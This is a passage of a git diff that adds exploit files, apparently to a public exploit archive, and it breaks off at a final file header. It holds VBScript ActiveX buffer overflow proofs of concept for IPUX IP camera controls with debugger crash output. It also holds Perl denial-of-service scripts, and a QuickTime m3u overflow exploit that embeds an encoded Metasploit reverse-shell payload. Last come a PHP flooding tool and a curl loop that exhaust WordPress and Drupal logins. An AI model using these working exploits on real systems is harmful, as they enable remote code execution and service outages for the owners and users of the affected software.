+targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
+prototype  = "Function CGI_ParamGet ( ByVal sGroup As String ,  ByVal sName As String ) As String"
+memberName = "CGI_ParamGet"
+progid     = "UltraMJCamLib.UltraMJCamX"
+argCount   = 2
+arg1=String(4116, "A")
+arg2="defaultV"
+target.CGI_ParamGet arg1 ,arg2 
+</script>
+</html>
+
+
+---9
+
+
+<html>
+<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
+prototype  = "Function CGI_ParamSet ( ByVal sGroup As String ,  ByVal sName As String ,  ByVal SVal As String ) As Long"
+memberName = "CGI_ParamSet"
+progid     = "UltraMJCamLib.UltraMJCamX"
+argCount   = 3
+arg1=String(10260, "A")
+arg2="defaultV"
+arg3="defaultV"
+target.CGI_ParamSet arg1 ,arg2 ,arg3 
+</script>
+</html>
diff --git a/platforms/hardware/webapps/35421.txt b/platforms/hardware/webapps/35421.txt
new file mode 100755
index 000000000..c3d157ec8
--- /dev/null
+++ b/platforms/hardware/webapps/35421.txt
@@ -0,0 +1,175 @@
+IPUX CL5452/CL5132 IP Camera (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow
+
+
+Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
+Product web page: http://www.ipux.net | http://www.fitivision.com
+Affected version: Bullet Type ICL5132 (firmware: ICL5132 2.0.0-2 20130730 r1112)
+                  Bullet Type ICL5452
+
+Summary: The device is H.264 Wired/Wireless IP Camera with 1.3 Mega-pixel sensor.
+With high performance H.264 video compression, the file size of video stream is
+extremely reduced, as to optimize the network bandwidth efficiency. It has full
+Pan/Tilt function and 3X digital zoom feature for a larger space monitoring. The
+built-in USB port provides a convenient and portable storage option for local storage
+of event and schedule recording, especially network disconnected.
+
+Desc: The UltraSVCam ActiveX Control 'UltraSVCamX.ocx' suffers from a stack buffer
+overflow vulnerability when parsing large amount of bytes to several functions in
+UltraSVCamLib, resulting in memory corruption overwriting several registers including
+the SEH. An attacker can gain access to the system of the affected node and execute
+arbitrary code.
+
+----------------------------------------------------------------------------------
+
+(3ef0.3e0c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraSVCamX.ocx - 
+eax=41414149 ebx=00000001 ecx=00003e0c edx=02163f74 esi=41414141 edi=02163f74
+eip=77e8466c esp=003eef8c ebp=003eefc0 iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+ntdll!RtlDeleteCriticalSection+0x77:
+77e8466c 833800          cmp     dword ptr [eax],0    ds:002b:41414149=????????
+
+----------------------------------------------------------------------------------
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+                              @zeroscience
+
+
+Advisory ID: ZSL-2014-5213
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5213.php
+
+
+16.11.2014
+
+---
+
+
+Properties:
+-----------
+
+FileDescription		UltraSVCam ActiveX Control
+FileVersion		1, 0, 53, 34 and 1, 0, 53, 33
+InternalName		UltraSVCamX
+OriginalFileName	UltraSVCamX.ocx
+ProductName		UltraSVCam device ActiveX Control
+ProductVersion		1, 0, 53, 34 and 1, 0, 53, 33
+
+
+List of members:
+----------------
+
+Interface IUltraSVCamX : IDispatch
+Default Interface: True
+Members : 51
+	RemoteHost
+	RemotePort
+	AccountCode
+	Password
+	UserName
+	fChgImageSize
+	ImgWidth
+	ImgHeight
+	SnapFileName
+	AVIRecStart
+	SetImgScale
+	OpenFolder
+	OpenFileDlg
+	TriggerStatus
+	AVIRecStatus
+	PlayVideo
+	SetAutoScale
+	SetPTUserAllow
+	SetLanguage
+	SetFullScreen
+	SetZoom
+	SetDirectShow
+	SetROIParam
+	FOpen
+	FSeek
+	FDeleteFile
+
+
+Vulnerable members of the class:
+--------------------------------
+
+RemoteHost
+AccountCode
+SnapFileName
+OpenFolder
+
+
+PoC(s):
+-------
+
+
+---1
+
+
+<html>
+<object classid='clsid:33AD836E-B04E-4114-B39F-AB77AAA08487' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraSVCamX.ocx"
+prototype  = "Property Let RemoteHost As String"
+memberName = "RemoteHost"
+progid     = "UltraSVCamLib.UltraSVCamX"
+argCount   = 1
+arg1=String(11284, "A")
+target.RemoteHost = arg1
+</script>
+</html>
+
+
+---2
+
+
+<html>
+<object classid='clsid:33AD836E-B04E-4114-B39F-AB77AAA08487' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraSVCamX.ocx"
+prototype  = "Property Let AccountCode As String"
+memberName = "AccountCode"
+progid     = "UltraSVCamLib.UltraSVCamX"
+argCount   = 1
+arg1=String(1044, "A")
+target.AccountCode = arg1
+</script>
+</html>
+
+
+---3
+
+
+<html>
+<object classid='clsid:33AD836E-B04E-4114-B39F-AB77AAA08487' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraSVCamX.ocx"
+prototype  = "Property Let SnapFileName As String"
+memberName = "SnapFileName"
+progid     = "UltraSVCamLib.UltraSVCamX"
+argCount   = 1
+arg1=String(11284, "A")
+target.SnapFileName = arg1
+</script>
+</html>
+
+
+---4
+
+
+<html>
+<object classid='clsid:33AD836E-B04E-4114-B39F-AB77AAA08487' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraSVCamX.ocx"
+prototype  = "Function OpenFolder ( ByVal sInitPath As String ) As String"
+memberName = "OpenFolder"
+progid     = "UltraSVCamLib.UltraSVCamX"
+argCount   = 1
+arg1=String(2068, "A")
+target.OpenFolder arg1 
+</script>
+</html>
diff --git a/platforms/hardware/webapps/35422.txt b/platforms/hardware/webapps/35422.txt
new file mode 100755
index 000000000..59ea43301
--- /dev/null
+++ b/platforms/hardware/webapps/35422.txt
@@ -0,0 +1,314 @@
+?
+IPUX CS7522/CS2330/CS2030 IP Camera (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow
+
+
+Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
+Product web page: http://www.ipux.net | http://www.fitivision.com
+Affected version: PT Type ICS2330 (firmware: ICS2330 1.1.0-29 20140120 r4296)
+                  Cube Type ICS2030 (firmware: ICS2030 1.1.0-21 20130223 r3967)
+                  Dome Type ICS7522 (firmware: ICS7522 1.1.0-7 20120413 r3812)
+
+Summary: The device is H.264 Wired/Wireless IP Camera with 1.3 Mega-pixel sensor.
+With high performance H.264 video compression, the file size of video stream is
+extremely reduced, as to optimize the network bandwidth efficiency. It has full
+Pan/Tilt function and 3X digital zoom feature for a larger space monitoring. The
+built-in USB port provides a convenient and portable storage option for local storage
+of event and schedule recording, especially network disconnected.
+
+Desc: The UltraHVCam ActiveX Control 'UltraHVCamX.ocx' suffers from a stack buffer
+overflow vulnerability when parsing large amount of bytes to several functions in
+UltraHVCamLib, resulting in memory corruption overwriting several registers including
+the SEH. An attacker can gain access to the system of the affected node and execute
+arbitrary code.
+
+----------------------------------------------------------------------------------
+
+(4b24.478c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraHVCamX.ocx - 
+eax=02d04d4f ebx=001dc890 ecx=41414141 edx=41414141 esi=001d6d6c edi=00000009
+eip=10032459 esp=0030efe8 ebp=0030efec iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
+UltraHVCamX!DllUnregisterServer+0x100e9:
+10032459 8b12            mov     edx,dword ptr [edx]  ds:002b:41414141=????????
+0:000> d ecx
+41414141  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+41414151  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+41414161  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+41414171  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+41414181  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+41414191  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+414141a1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+414141b1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+0:000> d eax
+02d04d4f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+02d04d5f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+02d04d6f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+02d04d7f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+02d04d8f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+02d04d9f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+02d04daf  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+02d04dbf  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+
+----------------------------------------------------------------------------------
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+                              @zeroscience
+
+
+Advisory ID: ZSL-2014-5212
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5212.php
+
+
+16.11.2014
+
+---
+
+
+Properties:
+-----------
+
+FileDescription		UltraHVCam ActiveX Control
+FileVersion		1, 0, 52, 55 and 1, 0, 52, 54
+InternalName		UltraHVCamX
+OriginalFileName	UltraHVCamX.ocx
+ProductName		UltraHVCam device ActiveX Control
+ProductVersion		1, 0, 52, 55 and 1, 0, 52, 54
+
+
+List of members:
+----------------
+
+Interface IUltraHVCamX : IDispatch
+Default Interface: True
+Members : 66
+	RemoteHost
+	RemotePort
+	AccountCode
+	GetConfigValue
+	SetConfigValue
+	SetCGIAPNAME
+	Password
+	UserName
+	fChgImageSize
+	ImgWidth
+	ImgHeight
+	SnapFileName
+	AVIRecStart
+	SetImgScale
+	OpenFolder
+	OpenFileDlg
+	TriggerStatus
+	AVIRecStatus
+	Event_Frame
+	PlayVideo
+	SetAutoScale
+	Event_Signal
+	WavPlay
+	CGI_ParamGet
+	CGI_ParamSet
+	MulticastEnable
+	MulticastStatus
+	SetPTUserAllow
+	SetLanguage
+	SetZoomButtonFontColor
+	SetZoomButtonColor
+	SetFullScreen
+
+
+Vulnerable members of the class:
+--------------------------------
+
+RemoteHost
+AccountCode
+SetCGIAPNAME
+Password
+UserName
+SnapFileName
+OpenFolder
+CGI_ParamGet
+CGI_ParamSet
+MulticastEnable
+
+
+PoC(s):
+-------
+
+
+---1
+
+
+<html>
+<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
+prototype  = "Function MulticastEnable ( ByVal sIP As String ,  ByVal lPort As Long ) As Long"
+memberName = "MulticastEnable"
+progid     = "UltraHVCamLib.UltraHVCamX"
+argCount   = 2
+arg1=String(13332, "A")
+arg2=1
+target.MulticastEnable arg1 ,arg2 
+</script>
+</html>
+
+
+---2
+
+
+<html>
+<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
+prototype  = "Property Let RemoteHost As String"
+memberName = "RemoteHost"
+progid     = "UltraHVCamLib.UltraHVCamX"
+argCount   = 1
+arg1=String(2068, "A")
+target.RemoteHost = arg1
+</script>
+</html>
+
+
+---3
+
+
+<html>
+<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
+prototype  = "Property Let AccountCode As String"
+memberName = "AccountCode"
+progid     = "UltraHVCamLib.UltraHVCamX"
+argCount   = 1
+arg1=String(1044, "A")
+target.AccountCode = arg1
+</script>
+</html>
+
+
+---4
+
+
+<html>
+<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
+prototype  = "Property Let SetCGIAPNAME As String"
+memberName = "SetCGIAPNAME"
+progid     = "UltraHVCamLib.UltraHVCamX"
+argCount   = 1
+arg1=String(1044, "A")
+target.SetCGIAPNAME = arg1
+</script>
+</html>
+
+
+---5
+
+
+<html>
+<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
+prototype  = "Property Let Password As String"
+memberName = "Password"
+progid     = "UltraHVCamLib.UltraHVCamX"
+argCount   = 1
+arg1=String(1044, "A")
+target.Password = arg1
+</script>
+</html>
+
+
+---6
+
+
+<html>
+<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
+prototype  = "Property Let UserName As String"
+memberName = "UserName"
+progid     = "UltraHVCamLib.UltraHVCamX"
+argCount   = 1
+arg1=String(1044, "A")
+target.UserName = arg1
+</script>
+</html>
+
+
+---7
+
+
+<html>
+<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
+prototype  = "Property Let SnapFileName As String"
+memberName = "SnapFileName"
+progid     = "UltraHVCamLib.UltraHVCamX"
+argCount   = 1
+arg1=String(1044, "A")
+target.SnapFileName = arg1
+</script>
+</html>
+
+
+---8
+
+
+<html>
+<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
+prototype  = "Function OpenFolder ( ByVal sInitPath As String ) As String"
+memberName = "OpenFolder"
+progid     = "UltraHVCamLib.UltraHVCamX"
+argCount   = 1
+arg1=String(1044, "A")
+target.OpenFolder arg1 
+</script>
+</html>
+
+
+---9
+
+
+<html>
+<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
+prototype  = "Function CGI_ParamGet ( ByVal sGroup As String ,  ByVal sName As String ) As String"
+memberName = "CGI_ParamGet"
+progid     = "UltraHVCamLib.UltraHVCamX"
+argCount   = 2
+arg1=String(1044, "A")
+arg2="defaultV"
+target.CGI_ParamGet arg1 ,arg2 
+</script>
+</html>
+
+
+---10
+
+
+<html>
+<object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
+prototype  = "Function CGI_ParamSet ( ByVal sGroup As String ,  ByVal sName As String ,  ByVal SVal As String ) As Long"
+memberName = "CGI_ParamSet"
+progid     = "UltraHVCamLib.UltraHVCamX"
+argCount   = 3
+arg1=String(1044, "A")
+arg2="defaultV"
+arg3="defaultV"
+target.CGI_ParamSet arg1 ,arg2 ,arg3 
+</script>
+</html>
diff --git a/platforms/multiple/dos/35437.pl b/platforms/multiple/dos/35437.pl
new file mode 100755
index 000000000..14dd4c1d7
--- /dev/null
+++ b/platforms/multiple/dos/35437.pl
@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/46827/info
+
+Air Contacts Lite is prone a denial-of-service vulnerability.
+
+Successful exploits may allow an attacker to crash the affected application, resulting in a denial-of-service condition. 
+
+#!/usr/bin/perl
+use IO::Socket;
+      if (@ARGV < 1) {
+              usage();
+      }
+      $ip     = $ARGV[0];
+      $port   = $ARGV[1];
+      print "[+] Sending request...\n";
+      $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
+"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
+      print $socket "GET http://www.example.com. HTTP/1.1\r\n";
+      print $socket "Host: http://www.example.com.\r\n";
+      print $socket "Content-Length: 0\x78\x41\x71\x69\r\n\r\n";
+      sleep(2);
+      close($socket);
+      print "[+] Done!\n";
+
+sub usage() {
+      print "[-] example - Air Contacts Lite (DoS)\n\n";
+      print "[-] Usage: <". $0 ."> <host> <port>\n";
+      print "[-] Example: ". $0 ." 127.0.0.1 80\n";
+      exit;
+}
\ No newline at end of file
diff --git a/platforms/osx/remote/35433.pl b/platforms/osx/remote/35433.pl
new file mode 100755
index 000000000..84dd5c5e2
--- /dev/null
+++ b/platforms/osx/remote/35433.pl
@@ -0,0 +1,118 @@
+source: http://www.securityfocus.com/bid/46799/info
+
+Apple QuickTime is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
+
+An attacker can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
+
+QuickTime 7.5.x is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl
+
+###
+# Title : QuickTime Player v 7.5.x (m3u) Stack Buffer Overflow
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com
+# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
+# Twitter page : twitter.com/kedans
+# platform : Windows
+# Impact : Remote Access and BOF
+# Tested on : Windows XP SP3 Français 
+# Target :  QuickTime Player v 7.5.x
+###
+# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
+# ------------
+#START SYSTEM /root@MSdos/ : 
+system("title KedAns-Dz");
+system("color 1e");
+system("cls");
+print "\n\n";
+print "    |===========================================================|\n";
+print "    |= [!] Name : QuickTime Player v 7.5.x (m3u) / Apple Inc.  =|\n";
+print "    |= [!] Exploit : Stack Buffer Overflow                     =|\n";
+print "    |= [!] Author : KedAns-Dz                                  =|\n";
+print "    |= [!] Mail: Ked-h(at)hotmail(dot)com                      =|\n";
+print "    |===========================================================|\n";
+sleep(2);
+print "\n";
+print " [!] Please Wait Loading...\n";
+# Payload Parameter (http://www.metasploit.com) 
+# windows/shell_reverse_tcp - 739 bytes
+# Encoder: x86/alpha_mixed
+# LHOST=127.0.0.1, LPORT=4444, ReverseConnectRetries=5, =>
+my $payload = 
+"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
+"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
+"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
+"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
+"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
+"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
+"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
+"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d" .
+"\x38\x4e\x69\x47\x70\x43\x30\x45\x50\x45\x30\x4d\x59\x4a" .
+"\x45\x45\x61\x48\x52\x43\x54\x4e\x6b\x50\x52\x50\x30\x4c" .
+"\x4b\x51\x42\x46\x6c\x4e\x6b\x46\x32\x46\x74\x4c\x4b\x50" .
+"\x72\x46\x48\x46\x6f\x4f\x47\x43\x7a\x51\x36\x46\x51\x49" .
+"\x6f\x46\x51\x4f\x30\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x43" .
+"\x32\x44\x6c\x47\x50\x4f\x31\x48\x4f\x46\x6d\x43\x31\x49" .
+"\x57\x48\x62\x4c\x30\x51\x42\x42\x77\x4c\x4b\x50\x52\x42" .
+"\x30\x4c\x4b\x43\x72\x45\x6c\x46\x61\x4a\x70\x4c\x4b\x43" .
+"\x70\x43\x48\x4e\x65\x4b\x70\x42\x54\x50\x4a\x45\x51\x48" .
+"\x50\x46\x30\x4e\x6b\x50\x48\x45\x48\x4e\x6b\x51\x48\x51" .
+"\x30\x45\x51\x48\x53\x48\x63\x47\x4c\x43\x79\x4e\x6b\x47" .
+"\x44\x4e\x6b\x46\x61\x4b\x66\x50\x31\x4b\x4f\x44\x71\x4f" .
+"\x30\x4e\x4c\x49\x51\x4a\x6f\x46\x6d\x46\x61\x4f\x37\x46" .
+"\x58\x4d\x30\x42\x55\x4a\x54\x46\x63\x43\x4d\x4c\x38\x47" .
+"\x4b\x51\x6d\x44\x64\x44\x35\x49\x72\x43\x68\x4c\x4b\x50" .
+"\x58\x45\x74\x47\x71\x48\x53\x51\x76\x4e\x6b\x46\x6c\x42" .
+"\x6b\x4c\x4b\x42\x78\x47\x6c\x45\x51\x48\x53\x4e\x6b\x45" .
+"\x54\x4c\x4b\x47\x71\x48\x50\x4f\x79\x42\x64\x44\x64\x47" .
+"\x54\x51\x4b\x51\x4b\x43\x51\x50\x59\x43\x6a\x46\x31\x4b" .
+"\x4f\x4d\x30\x50\x58\x43\x6f\x43\x6a\x4c\x4b\x45\x42\x48" .
+"\x6b\x4e\x66\x43\x6d\x42\x48\x50\x33\x44\x72\x45\x50\x43" .
+"\x30\x51\x78\x42\x57\x42\x53\x46\x52\x43\x6f\x50\x54\x43" .
+"\x58\x42\x6c\x44\x37\x44\x66\x45\x57\x49\x6f\x48\x55\x48" .
+"\x38\x4c\x50\x47\x71\x45\x50\x47\x70\x47\x59\x4b\x74\x51" .
+"\x44\x42\x70\x42\x48\x44\x69\x4d\x50\x42\x4b\x43\x30\x49" .
+"\x6f\x48\x55\x50\x50\x42\x70\x50\x50\x42\x70\x47\x30\x42" .
+"\x70\x43\x70\x50\x50\x43\x58\x48\x6a\x44\x4f\x49\x4f\x4d" .
+"\x30\x49\x6f\x4b\x65\x4e\x69\x48\x47\x42\x48\x43\x4f\x45" .
+"\x50\x43\x30\x47\x71\x43\x58\x43\x32\x45\x50\x44\x51\x43" .
+"\x6c\x4e\x69\x4a\x46\x51\x7a\x42\x30\x51\x46\x43\x67\x42" .
+"\x48\x4d\x49\x4e\x45\x51\x64\x51\x71\x49\x6f\x4e\x35\x50" .
+"\x68\x42\x43\x42\x4d\x42\x44\x47\x70\x4c\x49\x48\x63\x51" .
+"\x47\x51\x47\x51\x47\x50\x31\x4b\x46\x51\x7a\x47\x62\x51" .
+"\x49\x50\x56\x4d\x32\x49\x6d\x50\x66\x4f\x37\x42\x64\x46" .
+"\x44\x45\x6c\x47\x71\x43\x31\x4c\x4d\x50\x44\x51\x34\x42" .
+"\x30\x4a\x66\x43\x30\x43\x74\x50\x54\x42\x70\x43\x66\x43" .
+"\x66\x51\x46\x47\x36\x46\x36\x42\x6e\x50\x56\x46\x36\x42" .
+"\x73\x43\x66\x50\x68\x44\x39\x48\x4c\x47\x4f\x4b\x36\x4b" .
+"\x4f\x48\x55\x4c\x49\x4b\x50\x50\x4e\x42\x76\x43\x76\x49" .
+"\x6f\x50\x30\x42\x48\x43\x38\x4c\x47\x47\x6d\x43\x50\x49" .
+"\x6f\x4e\x35\x4f\x4b\x4a\x50\x4d\x65\x4d\x72\x51\x46\x51" .
+"\x78\x4d\x76\x4e\x75\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x47" .
+"\x4c\x46\x66\x43\x4c\x45\x5a\x4b\x30\x49\x6b\x49\x70\x43" .
+"\x45\x45\x55\x4d\x6b\x51\x57\x44\x53\x43\x42\x42\x4f\x51" .
+"\x7a\x47\x70\x46\x33\x4b\x4f\x49\x45\x41\x41"; #_ End Payload _
+# Parameter OverFlow => 
+my $eip = pack('V',0x7C86467B); # Jump ESP from kernel32.dll
+my $usmh = "\x90" x (50 - length($eip)); # Pack Length x 50
+my $ret = pack('V',0x040904b0); # Jump to ESP from QTOControl.dll
+$junk = "\x41" x 333 ; # Junk
+# immiXing Parameters >>>
+$kedans = $junk.$usmh.$ret.$payload ; # Evil KedAns
+# >> Creating ... 
+open (FILE ,"> Bo0M.m3u");
+print FILE $kedans ;
+print "\nFile successfully created!\n" or die print "\n OpsS! File is Not Created !! ";
+close (FILE);
+#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
+# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One
+# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;
+# > Algerians <  [D] HaCkerS-StreeT-Team [Z] > Hackers <
+# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others
+# 4nahdha.com : TitO (Dr.Ride) *  MEN_dz * Mr.LAK (Administrator) * all members ...
+# sec4ever.com members Dz : =>>
+#  Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others
+# hotturks.org : TeX * KadaVra ... all Others
+# Kelvin.Xgr ( kelvinx.net)
+#===========================================================================
diff --git a/platforms/php/webapps/35413.php b/platforms/php/webapps/35413.php
new file mode 100755
index 000000000..74595ec5c
--- /dev/null
+++ b/platforms/php/webapps/35413.php
@@ -0,0 +1,67 @@
+<?php
+
+echo "\nCVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability\n";
+echo "Proof-of-Concept developed by john@secureli.com (http://secureli.com)\n\n";
+echo "usage: php wordpressed.php domain.com username numberOfThreads\n";
+echo " e.g.: php wordpressed.php wordpress.org admin 50\n\n";
+
+echo "Sending POST data (username: " . $argv[2] . "; threads: " . $argv[3] . ") to " . $argv[1];
+
+do {
+ 
+$multi = curl_multi_init();
+$channels = array();
+
+for ($x = 0; $x < $argv[3]; $x++) {
+	$ch = curl_init();
+
+	$postData = array(
+		'log' => $argv[2],
+		'pwd' => str_repeat("A",1000000),
+		'redirect_to' => $argv[1] . "/wp-admin/",
+		'reauth' => 1,
+		'testcookie' => '1',
+		'wp-submit' => "Log%20In");
+
+	$cookieFiles = "cookie.txt";
+
+	curl_setopt_array($ch, array(
+	    CURLOPT_HEADER => 1,
+	    CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
+	    CURLOPT_REFERER => $argv[1] . "/wp-admin/",
+	    CURLOPT_COOKIEJAR => $cookieFiles,
+	    CURLOPT_COOKIESESSION => true,
+	    CURLOPT_URL => $argv[1] . '/wp-login.php',
+	    CURLOPT_RETURNTRANSFER => true,
+	    CURLOPT_POST => true,
+	    CURLOPT_POSTFIELDS => $postData,
+	    CURLOPT_FOLLOWLOCATION => true));
+	 
+    curl_multi_add_handle($multi, $ch);
+ 
+    $channels[$x] = $ch;
+}
+ 
+$active = null;
+
+do {
+	$mrc = curl_multi_exec($multi, $active);
+} while ($mrc == CURLM_CALL_MULTI_PERFORM);
+ 
+while ($active && $mrc == CURLM_OK) {
+    do {
+
+        $mrc = curl_multi_exec($multi, $active);
+    } while ($mrc == CURLM_CALL_MULTI_PERFORM);
+}
+
+foreach ($channels as $channel) {
+    curl_multi_remove_handle($multi, $channel);
+}
+ 
+curl_multi_close($multi);
+echo ".";
+} while (1==1);
+
+?>
+
diff --git a/platforms/php/webapps/35414.txt b/platforms/php/webapps/35414.txt
new file mode 100755
index 000000000..928cd2753
--- /dev/null
+++ b/platforms/php/webapps/35414.txt
@@ -0,0 +1,51 @@
+====================================================================
+DESCRIPTION:
+====================================================================
+A vulnerability present in Wordpress < 4.0.1 allows an
+attacker to send specially crafted requests resulting in CPU and memory
+exhaustion. This may lead to the site becoming unavailable or
+unresponsive (denial of service).
+
+====================================================================
+Time Line:
+====================================================================
+
+November 20, 2014 - A Wordpress security update and the security
+advisory is published.
+
+====================================================================
+Proof of Concept:
+====================================================================
+Generate a pyaload and try with a valid user:
+
+echo -n "name=admin&pass=" > valid_user_payload && printf "%s"
+{1..1000000} >> valid_user_payload && echo -n "&op=Log
+in&form_id=user_login" >> valid_user_payload
+
+Perform a Dos with a valid user:
+
+for i in `seq 1 150`; do (curl --data @valid_user_payload
+http://yoursite/wordpress/?q=user --silent > /dev/null &); sleep 0.5; done
+
+====================================================================
+Authors:
+====================================================================
+
+-- Javer Nieto -- http://www.behindthefirewalls.com
+-- Andres Rojas -- http://www.devconsole.info
+
+====================================================================
+References:
+====================================================================
+
+* https://wordpress.org/news/2014/11/wordpress-4-0-1/
+
+* https://www.drupal.org/SA-CORE-2014-006
+
+*
+http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
+
+*
+http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
+
+* http://www.devconsole.info/?p=1050
diff --git a/platforms/php/webapps/35415.txt b/platforms/php/webapps/35415.txt
new file mode 100755
